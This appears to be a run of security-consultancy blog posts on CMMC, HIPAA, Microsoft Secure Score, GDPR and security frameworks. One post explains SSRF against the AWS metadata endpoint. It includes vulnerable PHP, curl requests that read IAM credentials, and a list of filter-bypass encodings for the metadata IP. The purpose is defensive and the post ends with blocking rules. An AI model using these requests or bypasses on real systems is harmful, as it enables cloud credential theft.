From a quick assessment on what has been published thus far on the CMMC regulation and its overall goal, it appears that contractors lack of information security will no longer be tolerated by the DoD. Beginning with the introduction of the new regulation to the public in January of 2020, it is expected that new contractual requirements will include CMMC starting in June of 2020, and enforcement for current contractors starting in September of 2020. The current proposed structure for achieving the CMMC level of security is somewhat advanced, but not unprecedented.  One the more significant moves for this effort is the requirement that entities will be audited by an independent 3rd party, prior to any certification being awarded. The audit will likely require evidence to be presented to show that the correct level security controls are present and functioning as required.  Despite this regulation being new, it will likely be comprised of current NIST controls, as chosen by the DoD.

Given the nature of the Federal Information Security Modernization Act (FISMA), which is to protect all federal data, by means of the NIST controls, it is hard to conceive of any other security framework being used to meet the goals of CMMC. Even here, at the assurance level for the security controls, we find an interesting item for auditors, as they will be required to attest to the accuracy of their findings.  This step is likely in place to link auditors directly to an organization in the event of control failure or data breach. As such, it appears that the audit process will be evidence intensive, with audit artifacts and audit trails being required to demonstrate compliance with the selected controls.

So, how did we get here?  After a review by the DoD, it was determined that only 1% of contractors actually have some form of proper data protection in place, which naturally gives rise to concerns over the military’s highly sensitive data being secured against other nation-states that wish to obtain it.  These nation states and their activities are collectively known as the ‘advanced persistent threat’ (APT), as they are looking to obtain the targeted data, at almost any cost, including working to infiltrate systems for years. Additionally, there is the threat from criminal actors who are pursuing this data so that it can be sold on the black market to the highest bidder.  Either of these attackers represent a significant threat to military contractors, mainly due to the lack of appropriate information security controls being put in place.

Recently, the Department of Defense (DoD) announced a new initiative for the information security component of defense contractors, sub-contractors and the supply chain for DoD projects. This regulation is coming forward with the goal of securing the complete supply chain for the DoD which has had historical issues with keeping sensitive data secure.  Currently, DoD contractors and subcontractors are under obligations to protect the data they are entrusted with by having an information security program in place which deploys the National Institute of Standards and Technology (NIST) Special Publication (SP) 800-171 security controls. Despite those obligations, contractors have consistently had issues with protecting the military data entrusted to them, resulting in data exposure and breaches.

The concerns over data security materialized in stark reality when a civilian contactor was breached early in 2018, resulting in the exposure of more than 600 gigabytes of highly sensitive information to China by their cyberattack efforts. This breach significantly impacted the US Navy’s Sea Dragon project for the submarine fleet and the overall capability for conducting subsurface warfare operations. The exposure also included the breach of the electronic warfare library for that project, which contains a notable amount of highly classified data, as the name implies. What cannot be understated is the value of that data loss, as it represents untold years of accumulated United States hard won knowledge and expertise in several matters of science, research, and advancement from associated discoveries. It appears that, due to this breach and others like it, and the assessment of the poor computer security posture of DoD contractors, the DoD has been forced to take a stance of “no tolerance” for gaps within information security programs.

This breach and other incidents like it demonstrate that civilian contactors have not taken appropriate actions to properly deploy information security controls to protect DoD data. This is not a defense sector or DoD only issue, as the loss of intellectual property (IP) across the nation has been an ongoing event for a number of years, with the public only recently gaining a small insight to this major issue. What needs to be understood is the impact of the loss of the country’s IP to the rest of the globe, due to the apparent complete lack of concern regarding securing company owned systems and data. For some, the idea of IP loss is difficult to grasp or to put in easy-to-understand terms, however we can put some measurement to it over the past several years. From reports, the loss of IP has a measurable financial impact, with estimates placing the financial cost from stolen IP at $600 billion in lost revenue for the United States. That includes several billions of dollars being lost to counterfeit goods that compete on not only the domestic market, but the international market as well.

As we move forward in the digital age, the critical nature of having secured IT systems is becoming more and more glaring.  It seems clear that the information security factor will continue to have a large impact on all business sectors, with the military industry being the first to be called on to fully secure their systems. It is very likely this trend will expand outward, as people continue to express overwhelming concern over their personal data and how systems and applications are collecting and monitoring actions and activities. Companies that decide to get ahead of this significant problem are showing a commitment to long-term investment that should have positive impact on not only profit, but also revenue in the years to come.

Once full details on CMMC are made available, we will look to post a blog that gives a clearer definition as to what the CMMC requirements entail.

One of the greatest yet unknown dangers that face any cloud-based application is the combination of an SSRF vulnerability and the AWS Metadata endpoint. As this write up from Brian Krebbs explains, the breach at Capital One was caused by an SSRF vulnerability that was able to reach the AWS Metadata endpoint and extract the temporary security credentials associated with the EC2 instance's IAM Role. These credentials enabled the attacker to access other Capital One assets in the cloud and the result was over 100 million credit card applications were compromised.

The Vulnerabilities

In order to fully understand the impact of this cloud one-two punch it is necessary to break down the attack chain into its various components: SSRF and the AWS Metadata Endpoint. First, Server Side Request Forgery (SSRF) is a vulnerability that allows an attacker to control the destination address of an HTTP request sent from the vulnerable server. While this is not always the case (see Blind SSRF), the attacker can often see the response from the request as well. This allows the attacker to use the vulnerable server as a proxy for HTTP requests which can result in the exposure sensitive subnets and services.

Consider the following PHP code:

<?php
echo file_get_contents("http://".$_GET['hostname']."/configureIntegration.php");
?>

The code above sends an HTTP request to the hostname specified by the attacker in the "hostname" GET parameter. Logic like this is commonly found in the "Integrations" section of applications. This code is vulnerable to SSRF. Consider the following scenario: There is a sensitive service running on the loopback interface of the vulnerable server. This is emulated by the following configuration:

The PHP code above is hosted on the web server that faces the internet. When an attacker discovers this endpoint, he/she might use the following to grab the data from the internal application:

curl http://vulnerableserver.com/ssrf.php?hostname=localhost:8081/secret.html?

Which would result in a hit on the internal HTTP server:

┬─[justin@parrot:/t/secret]─[02:29:48 PM]
╰─>$ python3 -m http.server 8081 --bind 127.0.0.1
Serving HTTP on 127.0.0.1 port 8081 (http://127.0.0.1:8081/) ...
127.0.0.1 - - [15/Aug/2019 14:30:56] "GET /secret.html?/configureIntegration.php HTTP/1.0" 200 -

and return the following to the attacker:

This is only available on a loopback interface

Now that the danger of SSRF is clear, let's look at how this vulnerability may be exploited in the context of the cloud (AWS in particular).

Due to the dynamic nature of the cloud, it became necessary that server instances (EC2 for example) have some way to get some basic information about their configuration for the purpose of orienting themselves to the environment in which they were spun up. Out of this need, the AWS Metadata endpoint was born. This endpoint (169.254.169.254), when hit from any EC2 instance, will reveal information about the configuration of the particular EC2 instance. There is quite a lot of information available via this endpoint including: hostname, external ip address, metrics, lan information, security groups, and the IAM (Identity and Access Management) credentials associated with this EC2 instance. It is possible to retrieve these security credentials by hitting the following URL where [ROLE] is the IAM role name:

ec2-user@kali:~$ curl 169.254.169.254/latest/meta-data/iam/security-credentials/[ROLE]
{
  "Code" : "Success",
  "LastUpdated" : "2019-08-15T18:13:44Z",
  "Type" : "AWS-HMAC",
  "AccessKeyId" : "ASIAN0P3n0W4y1nv4L1d",
  "SecretAccessKey" : "A5tGuw2QXjmqu8cTEu1zs0Dw8yt905HDCzrF0AdE",
  "Token" : "AgoJb3JpZ2luX2VjEJv//////////wEaCXVzLWVhc3QtMSJHMEUCIEX46oh4kz6AtBiTfvoHGqfVuHJI29ryAZy/wXyR51SAiEA04Pyw9HSwSIRNx6vmYpqm7sD+DkLQiFzajuwI2aLEp4q8gMIMxABGgwzNjY4OTY1NTU5NDkiDOBEJDdUKxKUkgkhGyrPA7u8oSds5hcIM0EeoHvgxvCX/ChiDsuCEFO1ctMpOgaQuunsvKLzuaTp/86V96iZzuoPLnpHHsmIUTrCcwwGqFzyaqvJpsFWdv89YIhARAMlcQ1Cc9Cs4pTBSYc/BvbEFb1z0xWqPlBNVKLMzm2K5409f/KCK/eJsxp530Zt7a1MEBp/rvceyiA5gg+6hOu65Um+4BNT+CjlEk3gwL6JUUWr9a2LKYxmyR4fc7XtLD2zB0jwdnG+EPv7aDPj7EoWMUoR/dOQav/oSHi7bl6+kT+koKzwhU/Q286qsk0kXMfG/U95TdUr70I3b/L/dhyaudpLENSU7uvPFi8qGVGpnCuZCvGL2JVSnzf8327jyuiTF7GvXlvUTh8bjxnZ8pAhqyyuxEW1tosL2NuqRHmlCCfnE3wLXJ0yBUr7uxMHTfL1gueEWghymIGhAxiYIKA9PPiHCDrn4gl5AGmLyzqxenZgcNnuwMjeTnhQ0mVf7L8PR4ZWRo9h3C1wMbYnYNi5rdfQcByMIN/XoR2J74sBPor/aObMMHVnmpNjbtRgKh0Vpi48VgXhXfuCAHka3rbYeOBYC8z8nUWYJKuxv3Nj0cQxXDnYT6LPPXmtHgZaBSUwxMHW6gU6tAHi8OEjskLZG81wLq1DiLbdPJilNrv5RPn3bBF+QkkB+URAQ8NBZA/z8mNnDfvESS44fMGFsfTIvIdANcihZQLo6VYvECV8Vw/QaLP/GbljKPwztRC5HSPe6WrC06LZS9yeTpVGZ6jFIn1O/01hJOgEwsK7+DDwcXtE5qtOynmOJiY/iUjcz79LWh184My58ueCNxJuzIM9Tbn0sH3l1eBxECTihDNbL13v5g+8ENaih+f3rNU=",
  "Expiration" : "2019-08-16T00:33:31Z"
}

The response contains several things: the AccessKeyId, SecretAccessKey, and the Token for this account. Using these credentials, an attacker can login to AWS and compromise the server and potentially many other assets. In the case of the Capital One breach, these credentials were used to access an S3 bucket which contained millions of records of user information.

In summary, the poor implementation of the metadata service in AWS allows for an attacker to easily escalate an SSRF vulnerability to control many different cloud assets. Other cloud providers like Google Cloud and Microsoft Azure also provide access to a metadata service endpoint but requests to these endpoints require a special header. This prevents most SSRF vulnerabilities from accessing the sensitive data there.

How to prevent such a vulnerability

In order to prevent this type of vulnerability from occurring firewall rules will need to be put in place to block off the metadata endpoint. This can be done using the following iptables rule:

sudo iptables -A OUTPUT -d 169.254.169.254 -j DROP

This will prevent any access to this ip address. However, if access to the metadata endpoint is required, it is also possible to exclude certain users from this rule. For example, the iptables rule below would allow only the root user to access the metadata endpoint:

sudo iptables -A OUTPUT -m owner ! --uid-owner root -d 169.254.169.254 -j DROP

These blocks MUST be done at the network level - not the application level. There are too many ways to access this IP address. For example, all of these addresses below refer to the metadata service:

http://[::ffff:169.254.169.254]
http://[0:0:0:0:0:ffff:169.254.169.254]
http://425.510.425.510/ Dotted decimal with overflow
http://2852039166/ Dotless decimal
http://7147006462/ Dotless decimal with overflow
http://0xA9.0xFE.0xA9.0xFE/ Dotted hexadecimal
http://0xA9FEA9FE/ Dotless hexadecimal
http://0x41414141A9FEA9FE/ Dotless hexadecimal with overflow
http://0251.0376.0251.0376/ Dotted octal
http://0251.00376.000251.0000376/ Dotted octal with padding
http://169.254.169.254.xip.io/ DNS Name
http://A.8.8.8.8.1time.169.254.169.254.1time.repeat.rebind.network/ DNS Rebinding (8.8.8.8 -> AWS Metadata)

And there are many more. The only reliable way to address this issue is through a network level block of this IP.

The easiest way to check the IAM roles associated with each EC2 instance is to navigate to the EC2 Dashboard in AWS and add the column "IAM Instance Profile Name" by clicking the gear in the top right hand corner. Once the IAM role for each EC2 instance is easily visible, it is possible to check these roles to see if they are overly permissive for the what is required of that EC2 instance.

It is also imperative to understand the pivoting potential of these IAM Roles. If it is possible that an SSRF, XXE, or RCE vulnerability was exploited on any cloud system, the logs for the IAM Role associated with this instance must be thoroughly audited for malicious intent. To avoid a breach like Capital One, reach out to SynerComm.

Medical community challenge:

In a business environment where resources are limited, compliance requirements abound, and budgets are constantly challenged to meet cost containment targets, the complexity of the regulations your business is obligated to comply with can present a challenge. This challenge becomes even more difficult within the dynamic environment of hospitals, doctors’ offices, and all supporting elements of the medical profession. One of the key elements of facing this challenge is understanding what defines Protected Health Information (PHI) and what qualifies an organization as a HIPAA Covered Entity.

In broad terms, PHI is information that deals, or is associated in any way, with medical details or medical records of an individual. For the term “Electronic Protected Health Information” (ePHI), the definition doesn’t change much, as it simply encompasses the information or data being maintained in an electronic format, as on a computer or any other digital device. To clarify PHI more precisely, the privacy rule states it is “any information held by a covered entity which concerns health status, the provision of healthcare, or payment for healthcare that can be linked to an individual”. Most people respond with “wow, that sounds like it covers a lot” – which is does. Not only is the health-centric data covered by HIPAA, but so is data that directly identifies a person, or a “personal identifier”.  To help get our arms around this topic, we can gain understanding of what HIPAA considers as a personal identifier by reviewing a section of the regulation (Sections 164.514(b) and(c)) for the Privacy Rule. What we can see is that HIPAA considers the following 18 data points as personal identifiers:

Keep in mind the above is not an exhaustive list, as it is the definition by HIPAA that drives what can be considered a personal identifier.  What should be understood is that this is a starting point for the listing of what needs to be considered when looking to secure and keep private the PHI and ePHI within your organization. These are the data sets that need to be located and tagged so that they can be properly secured.  A good methodology is to review the official definition and decide if a particular data element qualifies as protected under HIPAA. It is advisable to err on the side of caution and include data that “could be” viewed as sensitive, because making the wrong determination can easily lead a company to having to pay HIPAA fines and penalties. Despite the small possibility that some data could have an extra layer of protection with this broader approach, it likely is a small price to pay when considering the potential fines and penalties – as was seen with Anthem Inc, reported to have paid $115 million to settle lawsuits over its HIPAA information breach.

This brings us to the next key element for HIPAA – which organizations are obligated to adhere to HIPAA, and am I one?

Here again, we see that HIPAA protections apply to a wide array of organizations and businesses – obviously, these entities are linked to, or perform some activity, with health information. It is the connection with data that brings in the HIPAA regulation and its requirements, as described below. The organizations that deal with medical data are officially termed as “covered entities”. Any contractors, vendors, or 3rd party relationships with a covered entity that involves PHI or ePHI fall under the official term of “business associates”. The requirements of HIPAA extend to business associates, through the covered entity, and are required to be clearly defined within the Business Associate Agreement (BAA). The BAA is to be a component of the contractual agreement between the two organizations.

For clarity on what qualifies as a covered entity: ­

Covered entities are the individuals, institutions, or organizations that maintain patient healthcare or payment information or would reasonably be expected to come into contact with PHI in the course of their daily duties – mostly, healthcare providers, health plans, and healthcare clearinghouses. Examples of covered entities include:

What about 3rd party vendors? If a 3rd party is engaged by a covered entity, then a Business Associates Agreement (BAA) is required, per HIPAA. A BAA is a focused document that addresses the requirements of HIPAA and acknowledges that the business relationship between the two parties will involve PHI or ePHI.  To help define where these components apply, here is a more detailed explanation of a Business Associate:

A Business Associate is a person or entity, other than a workforce member, who performs certain contractual functions or activities for a covered entity, or provides certain services to a covered entity, when those functions involve the access to, or the use or disclosure of, PHI. Per HIPAA, Business Associate functions or activities include (but not limited to) creating, receiving, maintaining, or transmitting protected health information for a functions including claims processing or administration, data analysis, processing or administration, utilization review, quality assurance, patient safety activities, billing, benefit management, practice management, and repricing.

It should be clear that the protections for HIPAA-defined medical information and data follow that data, no matter where it resides or who handles it. If your organization has any dealings or contact with medical companies or entities, and you do not have HIPAA protections in place, it would be worthwhile to perform a thorough review to be certain. That review should be fully documented and put forth to proper legal counsel to consider and make a definitive conclusion as to the obligations your company has under the HIPAA regulation.

Too often organizations seem to not have a good understanding of what data they have within their systems, and this leads to a lack of knowledge as to what legal obligations a company has committed itself to. Don’t let this happen to you – leverage the knowledge presented here, along with the information that is publicly available to make a clear determination as to what information security protections your company needs.

Medical community challenge:

In a business environment where resources are limited, compliance requirements abound, and budgets are constantly struggling to meet cost containment targets, the complexity of the regulations your business is required to comply with can present a challenge. This challenge becomes even more difficult within the dynamic environment of hospitals, doctors’ offices, and all of the supporting elements of the medical profession. Of course, these efforts are for the critical actions for life saving procedures for the focal point of the medical community - the patient. However, the digital age that we have moved in to over the past 20 years, despite the convenience it offers, comes with risks.  Patients have suffered the compromise of personal information, resulting in the patient population expressing considerable concerns regarding how their medical data is handled.

These concerns are not without due cause, given the sensitive business of life support that medical organizations have chosen to engage in, and the information involved with any medical procedure or activity.  Those concerns are partly expressed in the Health Insurance Portability and Accountability Act (HIPAA), which compels medical business to treat the data they possess with certain protections.  We will break down the predominant components of the HIPAA regulation as a basis for gaining a clear understanding of the drivers behind this law. In later postings on this topic, we will explore a strategy to align your organization to the information security requirements defined within HIPAA, HITECH, and the Omnibus rule.

The Health Insurance Portability and Accountability Act of 1996 establishes requirements for healthcare organizations with respect to ensuring security and privacy of protected healthcare information (PHI) and electronic protected healthcare information (ePHI). Broadly speaking, the overarching HIPAA principle for this type of data is that it is to remain private. Only people who have a definitive need for that data should be able to access it.  Of course, it should go without saying, that the only way to provide any kind of privacy is through the effective deployment of security measures to restrict access and exposure of the data.  The principles of privacy and security are irrefutably linked, as you cannot have one without the other, which gives the logic to the two more well-known rules of HIPAA that we will cover below.

There are a number of rules that are recognized within HIPAA, or what most people come to call HIPAA, which usually encompass other healthcare data regulations (e.g., HITECH and the Omnibus Final Rule).  Some of the rules are more well-known than others. Due to their history as the being first established with HIPAA, the best known are probably the Privacy Rule and the Security Rule. However, that’s not where the rules stop. There have been regulation updates to HIPAA as the issues around the handling of medical data have become better understood. It can be a challenge to keep track of all of these rules:

Now that you have a base-line understanding of what HIPAA is comprised of, we can move on to another primary component of HIPAA, which is understanding the criteria for PHI and ePHI, as well as understanding if you and your organization fall under the HIPAA regulation.
NEXT UP: What is PHI or ePHI and who has to abide by HIPAA?

Microsoft Secure Score. If you’re an IT administrator or security professional in an organization that uses Office 365, then you’ve no doubt used the tool or at least heard the term. It started as Office 365 Secure Score, but it was renamed in April 2018 to reflect a wider range of elements being scored.

What does it do? The tool looks at configurable settings and actions primarily within your Office 365 and Azure AD environment, and awards points for selections that meet best practices. In their words, “From a centralized dashboard you can monitor and improve the security for your Microsoft 365 identities, data, apps, devices, and infrastructure.”

But what doesn’t Microsoft Secure Score do? Microsoft is very good at telling you the great things its products can do, so I won’t repeat them here. The concept is sound, and I applaud them for giving users a tool that prioritizes secure configurations. They have come a long way from having auditing turned off by default in their products, e.g., Server 2000. I will point out why Microsoft Secure Score isn’t enough when it comes to understanding and testing the security of your Microsoft 365 environment.

Reason number 1:  The fox shouldn’t guard the hen house.

I am a Certified Public Accountant (CPA), and as such, I’ve spent a good portion of my life performing audits and assessments. A key independence rule CPAs abide by is:  an auditor must not audit his or her own work. Microsoft isn’t exactly independent when scoring its own product’s settings and capabilities. The financial motivation exists for Microsoft to setup a scoring system that makes users feel good about using Microsoft products.  Interoperability and performance will always be a higher priority than security.

This fact is furthered by the scoring system setup, which unlocks higher point opportunities with higher priced subscriptions. For example, Microsoft Cloud App Security and Azure Advanced Threat Protection are unlocked with E5 licenses, or as a $5.50 per user per month add on to an existing E3 license. This can be as much as a 70% price increase. If you want more chances to raise your overall score and have a higher score ceiling, spend more money…a very beneficial side-effect for Microsoft.

Also, remember that Secure Score is reflective of a Microsoft opinion and their subjective value for security controls they believe are important. This differs from widely accepted standards from organizations like NIST (National Institute of Standards and Technology) or CIS (Center for Internet Security) which are vendor neutral and have been refined, improved, and evolved over time.

Reason number 2:  No two environments are alike.

First let me say that Secure Score can be dented and bent to fit different environments. Scoring for certain areas can be manually entered if you have a third-party solution for a control. It will be incumbent on the person checking those controls to match what Secure Score is asking for. This is an all-or-nothing proposition as indicated within Secure Score, “Marking as resolved through third-party indicates that you have completed this action in a non-Microsoft app, and will give you the full point value of this action.

This is a key area where the Secure Score blanket fails to keep all areas of the entity covered and warm. There are bound to be components and configuration requirements that don’t quite fit what Secure Score evaluates or how it is scored. Think of the myriad of application combinations to handle Customer Relationship Management (CRM), Mobile Device Management (MDM), Security Information and Event Management (SIEM), Data Loss Prevention (DLP), and Multifactor Authentication (MFA) just to name a few.  An independent assessment of the environment that references best practice hardening guides for specific products comprising the solution is the only way to complete a proper evaluation.

Reason number 3:  Security is a journey, and a scorecard makes it a destination.

Don’t get me wrong, I like scores and grades. CPA’s generally like to measure and quantify things. Secure Score quantifies security, gives you trends over time on your score, and even allows you to measure your score against others based on a global average, industry average, and similar seat count average.

What I don’t like is how the scores can be manipulated, or how they can be construed. If the O365 administrator wants to improve their percentage of points achieved, the simplest way is to select “ignore” for the scoring areas that they have earned 0 points. Per Secure Score documentation, “Once you ignore an improvement action, it will no longer count toward the total Secure score points you have available.” Lower the denominator, keep the numerator, and poof! We are more secure. Or are we?

Executives looking at a scorecard may also be satisfied once it has reached a certain percentage of the total available. A project which will move the Secure Score from 650 out of 807 points to 710 out of 807 points appears to make the company about 8% more secure to a non-security decision maker handling the company budget. That project may not make the cut. In reality, any scoring shortage could represent a critical configuration issue that puts information assets at risk. That point may get lost if the focus is score.

Reason number 4:  A by-product of automated security is a false sense of it.

We hear stories all the time about breach activities that were being reported by automated logging systems, except no one was looking at the logs. IT management puts a tool in place and checks a box that implies the organization is secure in that area. Secure Score is ripe for this. Several improvement actions that will increase your score involve reviewing reports. When a link for a report is clicked, Secure Score assumes the report was reviewed and awards points. To keep the points, the link must be clicked within specific time intervals from within the Secure Score user interface, but this process does not record what was reviewed, or any notes or actions resulting from the review. There is no substitute for the actual review process and confirming that the review is happening.


Also consider an environment made up of multiple applications from different vendors where automated security evaluations, like Secure Score, are put in place. Each application that makes up the system interacts with other applications, potentially creating security control blind spots. For example, an email system that hands-off outbound email to a 3rd party DLP solution. Are there security holes in the process that transfers data in and out of the DLP application? Identifying those weaknesses requires a wholistic view, measured against current accepted best practices, that just isn’t offered by Secure Score or any other automated solution.

In conclusion, I think Secure Score has a place in monitoring and evaluating an organization’s information security posture. Microsoft is taking recommendations from its user base and is working to improve Secure Score’s results and widen its coverage. It is a barometer of an information security environment that could produce important information when properly utilized.  

The bottom line though is that it is just one tool. It cannot replace a diligent information security program; or at a higher level, an information security management system. Independent assessment and review of controls, policies, procedures, and the people managing the environment work in tandem to assure the confidentiality, integrity, and availability of an organizations information assets.  Consider the diversity of an organizations landscape:

These areas are all interdependent, yet all have their own unique traits and ways to be assessed and secured.  No one measurement tool is enough.

By Jeffrey T. Lemmermann, CPA, CISA, CITP, CEH - Information Assurance Consultant

GDPR has been in place since May 25th, 2018 and has already been used in legal actions against companies, with over 200,000 cases reported within this first year. The law is expected to make a notable impact on companies, as it has considerable fines and penalties. Even when compared to HIPAA and FISMA, GDPR has the most threatening teeth of any law to date. Even without GDPR being in full force, information security infractions have been getting more attention from multiple angles.  There have been some examples of how expensive this can get, as seen with Alphabet and its $9.4bn in fines, over the past 3 years. It would appear by these recent historical events that information security is rising to a point of serious contemplation for businesses world-wide.

However, this should not be a news flash by any means. The implementation of a serious data protection law by the European Union has been in development for some time now (starting in 1995). Most notably, the now infamous “Right to be forgotten” was generating news and conversation on this very topic.  Even still, as noted above, companies seem to be caught flat footed and have had to pay dearly for infractions.

GDPR drives the idea, at least in part, that information is a business asset, and as such, businesses are obligated to manage that asset in a manner that will not bring harm to its customers and employees. The public has voiced its concerns numerous times, indicating that loss of privacy has a legitimate ability to cause harm to an individual. GDPR gives those voices traction to hold organizations accountable for lack of proper management, security, and ultimately privacy of their Personally Identifiable Information (PII).

So, how can a company successfully meet the requirements of GDPR? Let’s take a look to explore the best viable answer to that question.

As a general principle of information security, evidence is the best method to prove how an organization deploys security controls.  GDPR is no exception, as it calls out repeatedly, the requirement to be able to “demonstrate compliance”, as seen in Chapter 2, Article 5 of the regulation, where the principles of processing personal data are addressed. To be clear, evidence, also known as ‘audit artifacts’ or ‘audit trails’ within other compliance frameworks and in general among the audit community.  Not surprisingly, within the United States, the requirement for audit artifacts is also seen in regulation, namely HIPAA and FISMA, both of which use the NIST standards to achieve security. The HIPAA focused security controls are seen in NIST SP 800-66, with FISMA using NIST SP 800-53, tying in the NIST Cyber Security framework to round out an information security program. Both regulations then use the NIST security control base, which in turn, supports privacy for IT systems and data.

Which brings us to the next important question, “What about privacy, isn’t that part of the GDPR?” Excellent point. Here again, NIST shows strength as a framework, as SP 800-53, rev 4, includes privacy controls, in appendix J.  When held up against the extensive GDPR requirements, it is clear that these privacy controls can easily be leveraged to support the goals of GDPR.  Some examples from NIST:

Naturally, this leads our conversation to “where do I need to apply these controls?” The data that is identified to be protected by GDPR and NIST is broadly understood as Personally Identifiable Information (PII) and both regulations have similar descriptions, only GDPR calls it “Personal Data”.  GDPR appears to be the broader of the two definitions, as seen below:

GDPR PII:  ‘personal data’ means any information relating to an identified or identifiable natural person (‘data subject’); an identifiable natural person is one who can be, directly or indirectly, in particular by reference to an identifier such as a name, an identification number, location data, an online identifier or to one or more factors specific to the physical, physiological, genetic, mental, economic, cultural or social identity of that natural person;

GDPR (article 4, Definitions, paragraph 1)

NIST PII: (Personally Identifiable Information): Information which can be used to distinguish or trace the identity of an individual (e.g., name, social security number, biometric records, etc.) alone, or when combined with other personal or identifying information which is linked or linkable to a specific individual (e.g., date and place of birth, mother’s maiden name, etc.).

For any company system, these are the data sets that you want to ‘tag’ or search for to ensure that the proper protections are in place. Once that footprint is well understood, you now have the starting point for deploying not only your security controls, but also to check to be sure the privacy controls are in place.  In the case of GDPR, the privacy controls repeat the requirement that signed consent be obtained from the data subject (much like HIPAA), with a number of notable exceptions – so be certain to review them for a full understanding. When considering how to tackle the requirements of not only GDPR, but FISMA, HIPAA or any other information security law or concern, the best place to look is NIST, in my opinion.  NIST not only offers the most complete, thorough and well researched controls, it is also the framework recognized by the US government and federal courts. Putting NIST controls in place puts any company in an advantageous position, not only for the potential of being able to understand the requirements of a government contract, but for also showing the positive actions that a company takes regarding information security if ever questioned in court.

GDPR can offer some insight on how the overall public is viewing information security, and how that scope is more expansive than one might initially think. Interestingly, GDPR addresses an area that came as a surprise to me, which is centered around the use of ‘junk mail’ and spam.  Both are addressed within the regulation, which in turn, will reduce the amount of unwanted traffic across your inbox, as well as your mailbox (if you reside in the EU).

Overall, from not only review of the regulation and associated writings on the subject, but from knowledge of the federal level protections, GDPR is very much in line with the principles of FISMA, if not directly in line with some of its stated requirements.  To date, there is no officially identified framework to address the GDPR requirements, and based on my assessment, it makes the most sense to look to the NIST framework to address this shark-toothed law. Not to mention, if you have any federally sourced data on your system, FISMA is in play within your organization already, which requires NIST protections be in place. As an added bonus, if you have no other data privacy or security concerns past GDPR, and you are based within the U.S., deploying NIST puts you in alignment for the only law within the country (currently).  As several people have already stated, the introduction of GDPR will most likely result in some sort of similar, if not more robust, new regulation within the United States.  So, if you’re based in the U.S., buckle up, the ride is most likely not over.

In the end, the ability to address GDPR is not insurmountable – it simply is an area that requires a well thought-out, managed, approach and plan; as is true for many areas in business.  Consider these items to start that process:

  1. Review the GDPR regulation and/or gain knowledge on where it applies to your company, possibly accomplished via a mapping exercise
  2. Review the security and privacy controls from NIST and determine where significant gaps exist in your current security and privacy posture
  3. Begin remediation of the gaps, tracking your progress to understand (and start to limit) your companies’ exposure to GDPR infractions

SynerComm can assist you with assessing your security or privacy controls status to address any framework, including PCI-DSS, FISMA or HIPAA. Contact us today for assistance on your information security needs!

Are you using a framework to establish your information security program? If not, I get it; it’s complicated. On a second thought, have you lost your mind?

I’ve been there. A number of years ago, while taking up a resolution to better document and organize a network that was developing rapidly, I began researching frameworks, mainly ISO and NIST.  How many pages? What??? That is just the description book; there is an implementation novel as well?

If you are starting from scratch, there is a knowledge barrier that appears to be very steep. Once you see it, you undoubtedly ask yourself, “is it worth the climb?”  Then, the next time you get on an airplane, ask yourself, “are pre-flight checklists worth the effort?”

A pre-flight checklist exists to ensure that all the requirements for a safe flight are in place before the plane leaves the ground. A pretty sound idea, since after it leaves the ground, it’s kind of too late.

I am squarely on the side that it is worth it and can make the case that all corporate IT breaches could have been avoided, or at the very least minimized, with a properly selected and implemented framework. Why? Because mature frameworks will contain controls, situations, and steps that you cannot think of on your own. They are designed to help prepare for the obvious and the unforeseen.

Consider the Target breach from 2013. This was a breach that started with a 3rd party contractor and ultimately led to the compromise of Personally Identifiable Information (PII) of 70 million customers along with data for 40 million credit and debit cards. There are many accounts of what happened during this event, but I’m going to draw a basic chain of events from the most widely accepted descriptions for our scenario:

  1. 3rd Party fell victim to malware attack and had their vendor credentials compromised.
  2. Credentials used to access Target’s hosted vendor site and find web application vulnerability.
  3. Exploit allowed attackers to upload tools to key systems on Target’s network.
  4. New credentials with administrator level access were created within the network.
  5. Databases identified that contained PII. Data copied to extraction point.
  6. Install malware on key systems to scan memory and capture credit card information.
  7. Credit card information copied to extraction point. Data extracted via FTP

For this breach, let’s look at NIST 800-53, an extremely deep and complete framework, consisting of 18 control families. It is divided into Low, Moderate, and High implementations based on the system impact level. We will assume “Low” for this analysis, which contains 115 controls to be considered (see https://nvd.nist.gov/800-53/Rev4/impact/low). Here are a few of the controls that are directly applicable to each of the steps in the breach:

  1. PS-7: THIRD-PARTY PERSONNEL SECURITY; RA-3: RISK ASSESSMENT
  2. AC-17: REMOTE ACCESS; RA-5: VULNERABILITY SCANNING
  3. AC-3: ACCESS ENFORCEMENT; CM-7: LEAST FUNCTIONALITY; SI-4: INFORMATION SYSTEM MONITORING
  4. AC-2: ACCOUNT MANAGEMENT; IA-2: IDENTIFICATION AND AUTHENTICATION (ORGANIZATIONAL USERS)
  5. AU-6: AUDIT REVIEW, ANALYSIS, AND REPORTING; SE-1: INVENTORY OF PERSONALLY IDENTIFIABLE INFORMATION
  6. CM-5: ACCESS RESTRICTIONS FOR CHANGE; SI-16: MEMORY PROTECTION,  
  7. SC-7: BOUNDARY PROTECTION; SC-8: TRANSMISSION CONFIDENTIALITY AND INTEGRITY

Note that I said “a few of the controls…” The above is just a quick sampling of controls that would have prevented, or at least, minimized the damage done in the breach. Other controls would also come into play, as some controls address documentation, some address enterprise level controls, some application level controls. The key is, they work together and rely on each other.

Here is an example:

SC-7 is documented this way on the nist.gov website –

SC-7 BOUNDARY PROTECTION

Control Description

The information system:
a. Monitors and controls communications at the external boundary of the system and at key internal boundaries within the system;
b. Implements subnetworks for publicly accessible system components that are [Selection: physically; logically] separated from internal organizational networks; and
c. Connects to external networks or information systems only through managed interfaces consisting of boundary protection devices arranged in accordance with an organizational security architecture.

Related to: AC-4AC-17CA-3CM-7CP-8IR-4RA-3SC-5SC-13

CM-7 is in the “Related to:” section, which shows controls that are reliant in either one direction or both directions. Here is CM-7 -

CM-7 LEAST FUNCTIONALITY

Control Description

The organization:
a. Configures the information system to provide only essential capabilities; and
b. Prohibits or restricts the use of the following functions, ports, protocols, and/or services:

Related to: AC-6CM-2RA-5SA-5SC-7

Each control has related controls, which is why proper implementation of the entire framework is essential to maximizing the benefits.

So how do you start? Pick your idiom: It’s like writing a novel, eating an elephant, mailing a jeep home, drinking a half barrel of beer. You do it one page, one bite, a few parts, or one glass at a time.

Which framework should you select? Statistically, according to Tenable’s Trends in Security Framework Adoption Survey (https://www.tenable.com/whitepapers/trends-in-security-framework-adoption) released in 2018, 84% of organizations in the US leverage a security framework in their organization, with the top 4 being:

  1. PCI DSS (47%)
  2. ISO 27001/27002 (35%)
  3. CIS Critical Security Controls (32%)
  4. NIST Framework for Improving Critical Infrastructure Security (29%)

